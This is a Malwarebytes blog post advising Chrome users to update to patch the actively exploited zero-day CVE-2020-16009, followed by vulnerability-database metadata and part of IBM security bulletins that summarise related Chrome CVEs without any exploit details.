Update your Chrome again as Google patches second zero-day in two weeks

2020-11-03T18:30:00

Description

Before you start to Google for election news, we'd like you to check whether your browser is at the latest and safest version. “Again?”, Chrome users may say. Yes, because Google has found another zero-day vulnerability - that means it's a hole that is actively being exploited right now. It's the second zero-day in Google found in the past two weeks. Last week [we reported about CVE-2020-15999](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2020/10/google-patches-exploited-zero-day-bug-that-affects-chrome-users/>) and advised to upgrade to at least version 86.0.4240.111. Today it is the turn of CVE-2020-16009 which is patched in Chrome version 86.0.4240.183 and later. ### How do I install Chrome patches? The easiest way to do it is to allow Chrome to update automatically which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser. So, it doesn’t hurt to check now and then. And now would be a good time, given the zero-day vulnerability. My preferred method, which also allows me to keep track, is to have Chrome open the page chrome://settings/help which you can also find by clicking **Settings > About Chrome**. If there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is **Relaunch **the browser. ![relaunch to update Chrome](https://blog.malwarebytes.com/wp-content/uploads/2020/11/relaunch_to_update-600x267.png) ### What is this Chrome patch for? Google has not disclosed what the 0-day does or how it is used. This is habitual as they want to give users a chance to update before giving threat-actors the chance to design their own exploits. But researchers came to the conclusion that it must have something to do with the way the Chrome browser handles Javascript by looking at the [changelog](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>). ![Chrome changelog for cve-2020-16009](https://blog.malwarebytes.com/wp-content/uploads/2020/11/CVE_2020_16009-600x72.png) After the update, the security hole should be patched and your settings page should say: ![Chrome is up to date](https://blog.malwarebytes.com/wp-content/uploads/2020/11/updated_version-600x239.png)Version 86.0.4240.183 If so, you’re good to go for now. Stay safe, everyone! The post [Update your Chrome again as Google patches second zero-day in two weeks](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2020/11/chrome-patches-second-zero-day-in-two-weeks/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).

{"id": "MALWAREBYTES:79956B6DF02C5841171B3AEE17565978", "type": "malwarebytes", "bulletinFamily": "blog", "title": "Update your Chrome again as Google patches second zero-day in two weeks", "description": "Before you start to Google for election news, we'd like you to check whether your browser is at the latest and safest version. \u201cAgain?\u201d, Chrome users may say. Yes, because Google has found another zero-day vulnerability - that means it's a hole that is actively being exploited right now.\n\nIt's the second zero-day in Google found in the past two weeks. Last week [we reported about CVE-2020-15999](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2020/10/google-patches-exploited-zero-day-bug-that-affects-chrome-users/>) and advised to upgrade to at least version 86.0.4240.111. Today it is the turn of CVE-2020-16009 which is patched in Chrome version 86.0.4240.183 and later.\n\n### How do I install Chrome patches?\n\nThe easiest way to do it is to allow Chrome to update automatically which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser. So, it doesn\u2019t hurt to check now and then. And now would be a good time, given the zero-day vulnerability. My preferred method, which also allows me to keep track, is to have Chrome open the page chrome://settings/help which you can also find by clicking **Settings > About Chrome**.\n\nIf there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is **Relaunch **the browser.\n\n![relaunch to update Chrome](https://blog.malwarebytes.com/wp-content/uploads/2020/11/relaunch_to_update-600x267.png)\n\n### What is this Chrome patch for?\n\nGoogle has not disclosed what the 0-day does or how it is used. This is habitual as they want to give users a chance to update before giving threat-actors the chance to design their own exploits. But researchers came to the conclusion that it must have something to do with the way the Chrome browser handles Javascript by looking at the [changelog](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>).\n\n![Chrome changelog for cve-2020-16009](https://blog.malwarebytes.com/wp-content/uploads/2020/11/CVE_2020_16009-600x72.png)\n\nAfter the update, the security hole should be patched and your settings page should say:\n\n![Chrome is up to date](https://blog.malwarebytes.com/wp-content/uploads/2020/11/updated_version-600x239.png)Version 86.0.4240.183\n\nIf so, you\u2019re good to go for now.\n\nStay safe, everyone!\n\nThe post [Update your Chrome again as Google patches second zero-day in two weeks](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2020/11/chrome-patches-second-zero-day-in-two-weeks/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "published": "2020-11-03T18:30:00", "modified": "2020-11-03T18:30:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2020/11/chrome-patches-second-zero-day-in-two-weeks/", "reporter": "Pieter Arntz", "references": [], "cvelist": ["CVE-2020-15999", "CVE-2020-16009"], "lastseen": "2020-11-04T22:16:34", "viewCount": 166, "enchantments": {"dependencies": {"references": [{"type": "almalinux", "idList": ["ALSA-2020:4952"]}, {"type": "amazon", "idList": ["ALAS2-2020-1565"]}, {"type": "androidsecurity", "idList": ["ANDROID:2021-01-01"]}, {"type": "archlinux", "idList": ["ASA-202010-10", "ASA-202010-11", "ASA-202011-12", "ASA-202011-2"]}, {"type": "attackerkb", "idList": ["AKB:B72B19ED-8E0B-4C11-9C2D-95A25BCC42A6", "AKB:C6F99915-AA1F-419E-A866-FCD1140D6667", "AKB:F497A3EB-F6FD-4D35-AD28-AD914147A8B3"]}, {"type": "centos", "idList": ["CESA-2020:4907"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1069", "CPAI-2020-1206"]}, {"type": "chrome", "idList": ["GCSA-164021554802225166", "GCSA-8196326206297867564"]}, {"type": "cisa", "idList": ["CISA:62CB6551A83E6AE3565CB9B75D07D5A7"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:D18C016FED8F2EC566E781EC4B141FB0"]}, {"type": "cve", "idList": ["CVE-2020-15999", "CVE-2020-16009"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2415-1:46C29", "DEBIAN:DSA-4777-1:A4DA9", "DEBIAN:DSA-4777-1:E3B2F", "DEBIAN:DSA-4824-1:11EBB"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-15999", "DEBIANCVE:CVE-2020-16009"]}, {"type": "fedora", "idList": ["FEDORA:53B8A30C6A0B", "FEDORA:6CB9E3094A01", "FEDORA:6F705313E07A", "FEDORA:8B8553055E91", "FEDORA:B7E3531099A9"]}, {"type": "freebsd", "idList": ["3EC6AB59-1E0C-11EB-A428-3065EC8FD3EC", "458DF97F-1440-11EB-AAEC-E0D55E2A8BF9", "F4722927-1375-11EB-8711-3065EC8FD3EC"]}, {"type": "gentoo", "idList": ["GLSA-202010-07", "GLSA-202011-12", "GLSA-202012-04"]}, {"type": "github", "idList": ["GHSA-M7MF-48HP-5QMR", "GHSA-PV36-H7JH-QM62"]}, {"type": "githubexploit", "idList": ["29E9BCA7-54F3-559F-8592-052F7EC902DA", "6E74F3AA-DE31-51CF-AFCB-E689CEE7AC4A", "8AB7F240-396E-5E7F-8F3A-483C176C91EE"]}, {"type": "gitlab", "idList": ["GITLAB-0D82490E586EFE9A8135FB348CC1AD86", "GITLAB-33FB34DF8FCDE663648620E2D0DB1C01", "GITLAB-57D5CB9EB1311D6803E54E131F70D80E", "GITLAB-6BE09606720F800C863D5D69D459E60F", "GITLAB-8236CCC6A902AC7ECFE2B7056937506F", "GITLAB-8F1B32BA01379FD4F3C2BD10C978DA9A", "GITLAB-98A9E708DB5E4D4010801900DD41B093", "GITLAB-A09C40C419EC540F29571BE33E54126D"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:7659E73B419D190E6DA39B1523454604", "GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "ibm", "idList": ["979C1C302656B100A9230D67DC5FDA9D31E695FEDE62BEA27566840475B31B1B", "A48FBFA17576575D0C4186F8C5D2568F5F5BC3CB4B99C62DCBEA7E11187CCCFD", "E58FC3F1E698B87258B01B21FF93EC241CCC5B41ED4495D2B3CC4151FDA89BFA"]}, {"type": "kaspersky", "idList": ["KLA11986", "KLA11990", "KLA12010", "KLA12011", "KLA12012", "KLA12013", "KLA12014"]}, {"type": "krebs", "idList": ["KREBS:613A537780BD40A6F8E0047CE8D3E6EC"]}, {"type": "mageia", "idList": ["MGASA-2020-0389"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:40B6CEF3C04EE6E976C145960F0C4FEE", "MALWAREBYTES:57638982EB29895FE6EC64032D00CE1D"]}, {"type": "mozilla", "idList": ["MFSA2020-50", "MFSA2020-51", "MFSA2020-52"]}, {"type": "mscve", "idList": ["MS:ADV200002"]}, {"type": "nessus", "idList": ["701289.PASL", "AL2_ALAS-2020-1565.NASL", "ALMA_LINUX_ALSA-2020-4952.NASL", "CENTOS8_RHSA-2020-4952.NASL", "CENTOS_RHSA-2020-4907.NASL", "DEBIAN_DLA-2415.NASL", "DEBIAN_DSA-4777.NASL", "DEBIAN_DSA-4824.NASL", "EULEROS_SA-2020-2483.NASL", "EULEROS_SA-2020-2496.NASL", "EULEROS_SA-2020-2510.NASL", "EULEROS_SA-2021-1585.NASL", "EULEROS_SA-2021-1598.NASL", "EULEROS_SA-2021-1652.NASL", "FEDORA_2020-3E005CE2E0.NASL", "FEDORA_2020-4E8E48DA22.NASL", "FEDORA_2020-6299161E89.NASL", "FEDORA_2020-6B35849EDD.NASL", "FEDORA_2020-768B1690F8.NASL", "FREEBSD_PKG_3EC6AB591E0C11EBA4283065EC8FD3EC.NASL", "FREEBSD_PKG_458DF97F144011EBAAECE0D55E2A8BF9.NASL", "FREEBSD_PKG_F4722927137511EB87113065EC8FD3EC.NASL", "GENTOO_GLSA-202010-07.NASL", "GENTOO_GLSA-202011-12.NASL", "GENTOO_GLSA-202012-04.NASL", "GOOGLE_CHROME_86_0_4240_111.NASL", "GOOGLE_CHROME_86_0_4240_183.NASL", "MACOSX_GOOGLE_CHROME_86_0_4240_111.NASL", "MACOSX_GOOGLE_CHROME_86_0_4240_183.NASL", "MACOS_FIREFOX_78_5_ESR.NASL", "MACOS_FIREFOX_83_0.NASL", "MACOS_THUNDERBIRD_78_5.NASL", "MICROSOFT_EDGE_CHROMIUM_86_0_622_51.NASL", "MICROSOFT_EDGE_CHROMIUM_86_0_622_63.NASL", "MOZILLA_FIREFOX_78_5_ESR.NASL", "MOZILLA_FIREFOX_83_0.NASL", "MOZILLA_THUNDERBIRD_78_5.NASL", "NEWSTART_CGSL_NS-SA-2021-0013_FREETYPE.NASL", "NEWSTART_CGSL_NS-SA-2021-0061_FREETYPE.NASL", "NEWSTART_CGSL_NS-SA-2021-0144_FREETYPE.NASL", "OPENSUSE-2020-1718.NASL", "OPENSUSE-2020-1734.NASL", "OPENSUSE-2020-1737.NASL", "OPENSUSE-2020-1744.NASL", "OPENSUSE-2020-1831.NASL", "OPENSUSE-2020-1952.NASL", "OPENSUSE-2020-2020.NASL", "OPENSUSE-2020-2031.NASL", "OPENSUSE-2020-2096.NASL", "OPENSUSE-2020-2187.NASL", "OPENSUSE-2020-2315.NASL", "OPENSUSE-2021-1134.NASL", "ORACLELINUX_ELSA-2020-4907.NASL", "ORACLELINUX_ELSA-2020-4952.NASL", "REDHAT-RHSA-2020-4351.NASL", "REDHAT-RHSA-2020-4907.NASL", "REDHAT-RHSA-2020-4949.NASL", "REDHAT-RHSA-2020-4950.NASL", "REDHAT-RHSA-2020-4951.NASL", "REDHAT-RHSA-2020-4952.NASL", "REDHAT-RHSA-2020-4974.NASL", "SLACKWARE_SSA_2020-294-01.NASL", "SL_20201104_FREETYPE_ON_SL7_X.NASL", "SUSE_SU-2020-14548-1.NASL", "SUSE_SU-2020-2995-1.NASL", "SUSE_SU-2020-2998-1.NASL", "SUSE_SU-2020-3383-1.NASL", "SUSE_SU-2020-3458-1.NASL", "SUSE_SU-2020-3548-1.NASL", "UBUNTU_USN-4593-1.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-4907", "ELSA-2020-4952"]}, {"type": "osv", "idList": ["OSV:ASB-A-171232105", "OSV:DLA-2415-1", "OSV:DSA-4777-1", "OSV:DSA-4824-1", "OSV:GHSA-M7MF-48HP-5QMR", "OSV:GHSA-PV36-H7JH-QM62"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159974"]}, {"type": "photon", "idList": ["PHSA-2022-0364", "PHSA-2022-0442"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:96DCE4C98C4BF0770916E3FFC1290807"]}, {"type": "redhat", "idList": ["RHSA-2020:4351", "RHSA-2020:4907", "RHSA-2020:4949", "RHSA-2020:4950", "RHSA-2020:4951", "RHSA-2020:4952", "RHSA-2020:4974", "RHSA-2020:5118", "RHSA-2020:5194", "RHSA-2020:5633", "RHSA-2020:5635", "RHSA-2021:0799"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-15999", "RH:CVE-2020-16009"]}, {"type": "slackware", "idList": ["SSA-2020-294-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1718-1", "OPENSUSE-SU-2020:1731-1", "OPENSUSE-SU-2020:1734-1", "OPENSUSE-SU-2020:1737-1", "OPENSUSE-SU-2020:1744-1", "OPENSUSE-SU-2020:1829-1", "OPENSUSE-SU-2020:1831-1", "OPENSUSE-SU-2020:1937-1", "OPENSUSE-SU-2020:1952-1", "OPENSUSE-SU-2020:2020-1", "OPENSUSE-SU-2020:2031-1", "OPENSUSE-SU-2020:2096-1", "OPENSUSE-SU-2020:2187-1", "OPENSUSE-SU-2020:2315-1", "OPENSUSE-SU-2021:1134-1"]}, {"type": "thn", "idList": ["THN:1CAE17F613AA7CBF6F4E99804811C608", "THN:7AD5261E90CC5E52D9933B8F13139A3E", "THN:89153A67BADBEDB4D309DCACBFF2EA7F", "THN:955CBC4C8C3F414A1ED3D5F7CAA08A9F", "THN:B62D46980D8C942D94FCDBF0A5899352", "THN:DAE548E4C591A2718BC3A3D2C9440FB1"]}, {"type": "threatpost", "idList": ["THREATPOST:67BFCF521C762895A107ADC4CE661654", "THREATPOST:6F7E512F15913694CF17A906715FE678", "THREATPOST:B94C72282597270B568FB72191A99385", "THREATPOST:D48D061BB27415A9A171838BA457EB0E", "THREATPOST:DF87733B74489628AB9F2C89704380A9"]}, {"type": "ubuntu", "idList": ["USN-4593-1", "USN-4593-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-15999", "UB:CVE-2020-16009"]}, {"type": "veracode", "idList": ["VERACODE:27664", "VERACODE:27808", "VERACODE:28657"]}, {"type": "zdt", "idList": ["1337DAY-ID-35211"]}]}, "score": {"value": -0.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "almalinux", "idList": ["ALSA-2020:4952"]}, {"type": "amazon", "idList": ["ALAS2-2020-1565"]}, {"type": "androidsecurity", "idList": ["ANDROID:2021-01-01"]}, {"type": "archlinux", "idList": ["ASA-202010-10", "ASA-202010-11", "ASA-202011-12", "ASA-202011-2"]}, {"type": "attackerkb", "idList": ["AKB:B72B19ED-8E0B-4C11-9C2D-95A25BCC42A6", "AKB:C6F99915-AA1F-419E-A866-FCD1140D6667", "AKB:F497A3EB-F6FD-4D35-AD28-AD914147A8B3"]}, {"type": "centos", "idList": ["CESA-2020:4907"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1069", "CPAI-2020-1206"]}, {"type": "chrome", "idList": ["GCSA-164021554802225166", "GCSA-8196326206297867564"]}, {"type": "cisa", "idList": ["CISA:62CB6551A83E6AE3565CB9B75D07D5A7"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:D18C016FED8F2EC566E781EC4B141FB0"]}, {"type": "cve", "idList": ["CVE-2020-15999", "CVE-2020-16009"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2415-1:46C29", "DEBIAN:DSA-4777-1:E3B2F", "DEBIAN:DSA-4824-1:11EBB"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-15999", "DEBIANCVE:CVE-2020-16009"]}, {"type": "fedora", "idList": ["FEDORA:53B8A30C6A0B", "FEDORA:6CB9E3094A01", "FEDORA:6F705313E07A", "FEDORA:8B8553055E91", "FEDORA:B7E3531099A9"]}, {"type": "freebsd", "idList": ["3EC6AB59-1E0C-11EB-A428-3065EC8FD3EC", "458DF97F-1440-11EB-AAEC-E0D55E2A8BF9", "F4722927-1375-11EB-8711-3065EC8FD3EC"]}, {"type": "gentoo", "idList": ["GLSA-202010-07", "GLSA-202011-12", "GLSA-202012-04"]}, {"type": "github", "idList": ["GHSA-M7MF-48HP-5QMR", "GHSA-PV36-H7JH-QM62"]}, {"type": "githubexploit", "idList": ["29E9BCA7-54F3-559F-8592-052F7EC902DA", "6E74F3AA-DE31-51CF-AFCB-E689CEE7AC4A"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:7659E73B419D190E6DA39B1523454604"]}, {"type": "ibm", "idList": ["979C1C302656B100A9230D67DC5FDA9D31E695FEDE62BEA27566840475B31B1B"]}, {"type": "kaspersky", "idList": ["KLA11986", "KLA12011"]}, {"type": "krebs", "idList": ["KREBS:613A537780BD40A6F8E0047CE8D3E6EC"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:40B6CEF3C04EE6E976C145960F0C4FEE", "MALWAREBYTES:57638982EB29895FE6EC64032D00CE1D"]}, {"type": "mozilla", "idList": ["MFSA2020-50"]}, {"type": "mscve", "idList": ["MS:ADV200002"]}, {"type": "nessus", "idList": ["AL2_ALAS-2020-1565.NASL", "CENTOS_RHSA-2020-4907.NASL", "DEBIAN_DSA-4777.NASL", "DEBIAN_DSA-4824.NASL", "EULEROS_SA-2020-2483.NASL", "EULEROS_SA-2020-2496.NASL", "EULEROS_SA-2020-2510.NASL", "EULEROS_SA-2021-1585.NASL", "EULEROS_SA-2021-1598.NASL", "EULEROS_SA-2021-1652.NASL", "FEDORA_2020-3E005CE2E0.NASL", "FEDORA_2020-4E8E48DA22.NASL", "FEDORA_2020-6B35849EDD.NASL", "FREEBSD_PKG_3EC6AB591E0C11EBA4283065EC8FD3EC.NASL", "FREEBSD_PKG_458DF97F144011EBAAECE0D55E2A8BF9.NASL", "FREEBSD_PKG_F4722927137511EB87113065EC8FD3EC.NASL", "GENTOO_GLSA-202010-07.NASL", "GENTOO_GLSA-202011-12.NASL", "GENTOO_GLSA-202012-04.NASL", "GOOGLE_CHROME_86_0_4240_111.NASL", "GOOGLE_CHROME_86_0_4240_183.NASL", "MACOSX_GOOGLE_CHROME_86_0_4240_111.NASL", "MACOSX_GOOGLE_CHROME_86_0_4240_183.NASL", "MACOS_FIREFOX_78_5_ESR.NASL", "MACOS_FIREFOX_83_0.NASL", "MACOS_THUNDERBIRD_78_5.NASL", "MICROSOFT_EDGE_CHROMIUM_86_0_622_51.NASL", "MICROSOFT_EDGE_CHROMIUM_86_0_622_63.NASL", "MOZILLA_FIREFOX_78_5_ESR.NASL", "MOZILLA_FIREFOX_83_0.NASL", "MOZILLA_THUNDERBIRD_78_5.NASL", "NEWSTART_CGSL_NS-SA-2021-0013_FREETYPE.NASL", "NEWSTART_CGSL_NS-SA-2021-0061_FREETYPE.NASL", "OPENSUSE-2020-1831.NASL", "OPENSUSE-2020-1952.NASL", "OPENSUSE-2020-2020.NASL", "OPENSUSE-2020-2031.NASL", "OPENSUSE-2020-2096.NASL", "OPENSUSE-2020-2187.NASL", "ORACLELINUX_ELSA-2020-4907.NASL", "ORACLELINUX_ELSA-2020-4952.NASL", "REDHAT-RHSA-2020-4907.NASL", "REDHAT-RHSA-2020-4949.NASL", "REDHAT-RHSA-2020-4950.NASL", "REDHAT-RHSA-2020-4951.NASL", "REDHAT-RHSA-2020-4952.NASL", "REDHAT-RHSA-2020-4974.NASL", "SLACKWARE_SSA_2020-294-01.NASL", "SL_20201104_FREETYPE_ON_SL7_X.NASL", "SUSE_SU-2020-14548-1.NASL", "SUSE_SU-2020-2995-1.NASL", "SUSE_SU-2020-2998-1.NASL", "SUSE_SU-2020-3383-1.NASL", "SUSE_SU-2020-3458-1.NASL", "SUSE_SU-2020-3548-1.NASL", "UBUNTU_USN-4593-1.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-4907", "ELSA-2020-4952"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159974"]}, {"type": "photon", "idList": ["PHSA-2022-0442", "PHSA-2022-0472"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:96DCE4C98C4BF0770916E3FFC1290807"]}, {"type": "redhat", "idList": ["RHSA-2020:4907"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-15999", "RH:CVE-2020-16009"]}, {"type": "slackware", "idList": ["SSA-2020-294-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1718-1", "OPENSUSE-SU-2020:1731-1", "OPENSUSE-SU-2020:1734-1", "OPENSUSE-SU-2020:1737-1", "OPENSUSE-SU-2020:1744-1", "OPENSUSE-SU-2020:1829-1", "OPENSUSE-SU-2020:1831-1"]}, {"type": "thn", "idList": ["THN:1CAE17F613AA7CBF6F4E99804811C608", "THN:89153A67BADBEDB4D309DCACBFF2EA7F", "THN:955CBC4C8C3F414A1ED3D5F7CAA08A9F", "THN:B62D46980D8C942D94FCDBF0A5899352", "THN:DAE548E4C591A2718BC3A3D2C9440FB1"]}, {"type": "threatpost", "idList": ["THREATPOST:67BFCF521C762895A107ADC4CE661654", "THREATPOST:6F7E512F15913694CF17A906715FE678", "THREATPOST:B94C72282597270B568FB72191A99385", "THREATPOST:D48D061BB27415A9A171838BA457EB0E", "THREATPOST:DF87733B74489628AB9F2C89704380A9"]}, {"type": "ubuntu", "idList": ["USN-4593-1", "USN-4593-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-16009"]}, {"type": "zdt", "idList": ["1337DAY-ID-35211"]}]}, "exploitation": null, "vulnersScore": -0.6}, "immutableFields": [], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "edition": 2, "scheme": null, "_state": {"dependencies": 1660032824, "score": 1659970229}, "_internal": {"score_hash": "c3beb1a203cab707e5671dc9cf106511"}}

{"ibm": [{"lastseen": "2022-10-01T01:51:57", "description": "## Summary\n\nIBM i2 Analyst's Notebook Premium uses a browser component version with known vulnerabilities.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-16013](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16013>) \n** DESCRIPTION: **Google Chrome could allow a remote attacker to bypass security restrictions, caused by inappropriate implementation in V8. By persuading a victim to visit a specially crafted Web site, an attacker could exploit this vulnerability to bypass security restrictions. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191522](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191522>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2020-16009](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16009>) \n** DESCRIPTION: **Google Chrome could allow a remote attacker to bypass security restrictions, caused by inappropriate implementation in V8. By persuading a victim to visit a specially crafted Web site, an attacker could exploit this vulnerability to bypass security restrictions. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/190998](<https://exchange.xforce.ibmcloud.com/vulnerabilities/190998>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2020-15999](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15999>) \n** DESCRIPTION: **Google Chrome is vulnerable to a heap-based buffer overflow, caused by improper bounds checking by Freetype. By persuading a victim to visit a specially crafted Web site, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base score: 8.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/190226](<https://exchange.xforce.ibmcloud.com/vulnerabilities/190226>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM i2 Analyst's Notebook Premium| IBM i2 Analyst's Notebook Premium 9.2.0 \nIBM i2 Analyst's Notebook Premium| All \nIBM i2 Analyst's Notebook Premium| IBM i2 Analyst's Notebook Premium 9.2.2 \nIBM i2 Analyst's Notebook Premium| IBM i2 Analyst's Notebook Premium 9.2.1 \n \n\n\n## Remediation/Fixes\n\nPlease visit your IBM customer portal to pick up the latest continuous delivery package containing a newer version of the Chromium plugin fixing the referenced issues.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\nJohn Zuccato, Rodney Ryan, Chris Shepherd, Nathan Roane, Vince Dragnea, Troy Fisher, Gabor Minyo and Elaheh Samani from IBM X-Force Ethical Hacking Team.\n\n## Change History\n\n21 Jul 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSXVMQ\",\"label\":\"i2 Analyst&apos;s Notebook Premium\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"9.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-23T15:10:10", "type": "ibm", "title": "Security Bulletin: IBM Analyst's Notebook Premium uses a component with known vulnerabilities (CVE-2020-16013, CVE-2020-16009, CVE-2020-15999)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16013"], "modified": "2021-07-23T15:10:10", "id": "A48FBFA17576575D0C4186F8C5D2568F5F5BC3CB4B99C62DCBEA7E11187CCCFD", "href": "https://www.ibm.com/support/pages/node/6474871", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-01T01:51:20", "description": "## Summary\n\nIBM Security Privileged Identity Manager has addressed several security issues as follows.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-1971](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971>) \n** DESCRIPTION: **OpenSSL is vulnerable to a denial of service, caused by a NULL pointer dereference. If the GENERAL_NAME_cmp function contain an EDIPARTYNAME, an attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192748](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192748>) for the current score. \nCVSS Vector: 